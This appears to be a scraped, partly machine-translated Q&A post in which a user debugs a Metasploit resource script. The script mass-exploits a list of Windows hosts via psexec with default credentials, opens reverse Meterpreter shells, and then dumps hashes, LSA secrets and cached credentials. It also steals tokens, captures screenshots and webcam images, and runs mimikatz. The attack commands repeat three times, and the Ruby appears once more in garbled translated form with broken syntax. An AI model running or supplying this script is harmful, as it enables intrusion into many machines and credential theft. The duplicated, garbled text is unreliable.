Ruby 编写Metasploit脚本以利用一组主机
我正在尝试在上复制脚本 在我的con_cmd_文件中Ruby 编写Metasploit脚本以利用一组主机,ruby,scripting,kali-linux,Ruby,Scripting,Kali Linux,我正在尝试在上复制脚本 在我的con_cmd_文件中 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set autorunscript multi_console_command -rc /root/Desktop/Scripting/met_cmd_file set lhost 192.168.1.10 set lport 4444 set ExitOnSession false exploi
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set autorunscript multi_console_command -rc /root/Desktop/Scripting/met_cmd_file
set lhost 192.168.1.10
set lport 4444
set ExitOnSession false
exploit -j
use exploit/windows/smb/psexec
set target 1
set smbuser admin
set smbpass admin
set smbdomain Admin
set disablepayloadhandler true
run post/windows/manage/priv_migrate
hashdump
run post/windows/gather/lsa_secrets
run post/windows/gather/cachedump
load incognito
list_tokens -u
screenshot
webcam_list
webcan_snap -v false
load mimikatz
kerberos
background
<ruby>
hostsfile="/root/Desktop/Scripting/hosts_file"
hosts=[]
File.open(hostsfile,"r") do |f|
f.each_line do |line|
hosts.push line.strip
end
end
# prepare the handler and console
self.run_single("resource /root/Desktop/Scripting/con_cmd_file")
# iterate through each host and run the exploit
hosts.each do |rhost|
self.run_single("set rhost #{rhost}")
self.run_single("exploit -j -z") end
</ruby>
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set autorunscript multi_console_command -rc /root/Desktop/Scripting/met_cmd_file
set lhost 192.168.1.10
set lport 4444
set ExitOnSession false
exploit -j
use exploit/windows/smb/psexec
set target 1
set smbuser admin
set smbpass admin
set smbdomain Admin
set disablepayloadhandler true
run post/windows/manage/priv_migrate
hashdump
run post/windows/gather/lsa_secrets
run post/windows/gather/cachedump
load incognito
list_tokens -u
screenshot
webcam_list
webcan_snap -v false
load mimikatz
kerberos
background
<ruby>
hostsfile="/root/Desktop/Scripting/hosts_file"
hosts=[]
File.open(hostsfile,"r") do |f|
f.each_line do |line|
hosts.push line.strip
end
end
# prepare the handler and console
self.run_single("resource /root/Desktop/Scripting/con_cmd_file")
# iterate through each host and run the exploit
hosts.each do |rhost|
self.run_single("set rhost #{rhost}")
self.run_single("exploit -j -z") end
</ruby>
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set autorunscript multi_console_command -rc /root/Desktop/Scripting/met_cmd_file
set lhost 192.168.1.10
set lport 4444
set ExitOnSession false
exploit -j
use exploit/windows/smb/psexec
set target 1
set smbuser admin
set smbpass admin
set smbdomain Admin
set disablepayloadhandler true
run post/windows/manage/priv_migrate
hashdump
run post/windows/gather/lsa_secrets
run post/windows/gather/cachedump
load incognito
list_tokens -u
screenshot
webcam_list
webcan_snap -v false
load mimikatz
kerberos
background
<ruby>
hostsfile="/root/Desktop/Scripting/hosts_file"
hosts=[]
File.open(hostsfile,"r") do |f|
f.each_line do |line|
hosts.push line.strip
end
end
# prepare the handler and console
self.run_single("resource /root/Desktop/Scripting/con_cmd_file")
# iterate through each host and run the exploit
hosts.each do |rhost|
self.run_single("set rhost #{rhost}")
self.run_single("exploit -j -z") end
</ruby>
hostsfile=“/root/Desktop/Scripting/hosts\u文件”
主机=[]
文件.open(hostsfile,“r”)do|f|
f、 每条线都要做|
hosts.push line.strip
结束
结束
#准备处理程序和控制台
self.run_single(“resource/root/Desktop/Scripting/con_cmd_file”)
#迭代每个主机并运行漏洞利用
主持人:每个人都有|
self.run_single(“set rhost{rhost}”)
self.run_single(“exploit-j-z”)结束
resource (iter_rc.rc)> Ruby Error: SyntaxError /usr/share/metasploit-framework/lib/rex/ui/text/resource.rb:52: unknown regexp options - Dktp ["/usr/share/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `eval'", "/usr/share/metasploit-framework/lib/rex/ui/text/resource.rb:61:in `load_resource'", "/usr/share/metasploit-framework/lib/msf/ui/console/driver.rb:183:in `block in initialize'", "/usr/share/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `each'", "/usr/share/metasploit-framework/lib/msf/ui/console/driver.rb:182:in `initialize'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'", "/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'", "/usr/bin/msfconsole:49:in `<main>'"]
resource(iter_rc.rc)>Ruby错误:SyntaxError/usr/share/metasploit framework/lib/rex/ui/text/resource.rb:52:unknown regexp选项-Dktp[“/usr/share/metasploit framework/lib/rex/ui/text/resource.rb:61:in`eval'”,/usr/share/metasploit framework/lib/rex/ui/text/resource.rb:61:in`load\u resource,“/usr/share/metasploit framework/lib/msf/ui/console/driver.rb:183:in`block in initialize'”、/usr/share/metasploit framework/lib/msf/ui/console/driver.rb:182:in`initialize'、/usr/share/metasploit framework/lib/msf/ui/ui/console/console/driver.rb:182:in`new'”/usr/share/metasploit framework/lib/metasploit/framework/command/console.rb:62:in‘driver’,/usr/share/metasploit framework/lib/metasploit/framework/command/console.rb:82:in‘start’,/usr/bin/msfconsole:49:in‘’]